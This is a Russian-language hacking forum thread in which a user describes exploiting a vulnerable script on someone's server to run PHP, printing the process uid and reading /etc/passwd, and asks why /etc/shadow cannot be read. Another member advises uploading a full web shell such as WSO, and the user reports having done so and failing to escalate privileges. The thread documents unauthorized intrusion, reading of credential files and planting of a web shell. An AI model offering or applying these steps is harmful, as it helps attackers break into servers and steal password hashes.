user: root uid:0 gid:0 а shadow не читает ((

Discussion in 'Безопасность и Анонимность' started by _gr34t, 4 Nov 2009.

  1. _gr34t

    _gr34t Member

    Joined:
    26 Oct 2008
    Messages:
    89
    Likes Received:
    13
    Reputations:
    5
    Всем привет!
    через уязвимость в скрипте выполняю
    PHP:
    echo "User: ".get_current_user()."uid: ".getmyuid()."gid: ".getmygid();
    Результат User: rootuid: 0gid: 0

    далее выполняю:
    PHP:
    echo file_get_contents('/etc/passwd');
    Результат: файл /etc/passwd

    далее выполняю:
    PHP:
    echo file_get_contents('/etc/shadow');
    Результат: 0

    Почему не удаётся прочитать /etc/shadow? Ведь права рута!
     
    #1 _gr34t, 4 Nov 2009
  2. geezer.code

    geezer.code Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    552
    Likes Received:
    358
    Reputations:
    90
    1. может быть *BSD (тогда /etc/master.passwd)
    2. какое нибудь хитрое chroot
    3. еще много вариантов

    имхо лучше найти папку на запись, и залить полноценный шелл, например wso.
    А там уже будет видно.
     
    #2 geezer.code, 4 Nov 2009
  3. diehard

    diehard Elder - Старейшина

    Joined:
    30 Sep 2007
    Messages:
    442
    Likes Received:
    266
    Reputations:
    15
    вруби для начала error_reporting(E_ALL);
     
    #3 diehard, 4 Nov 2009
  4. _gr34t

    _gr34t Member

    Joined:
    26 Oct 2008
    Messages:
    89
    Likes Received:
    13
    Reputations:
    5
    geezer.code, привет!
    1. Точно Linux
    2. Chroot не запущен (вроде)
    3. ...
    Шелл загрузил, но у него права 30 ( www ) Group: 30 ( www )
    И права поменять на рутовые через бажный чкрипт тоже не получается.

    diehard, привет. Сейчас попробую
     
    #4 _gr34t, 4 Nov 2009
    1 person likes this.
(You must log in or sign up to post here.)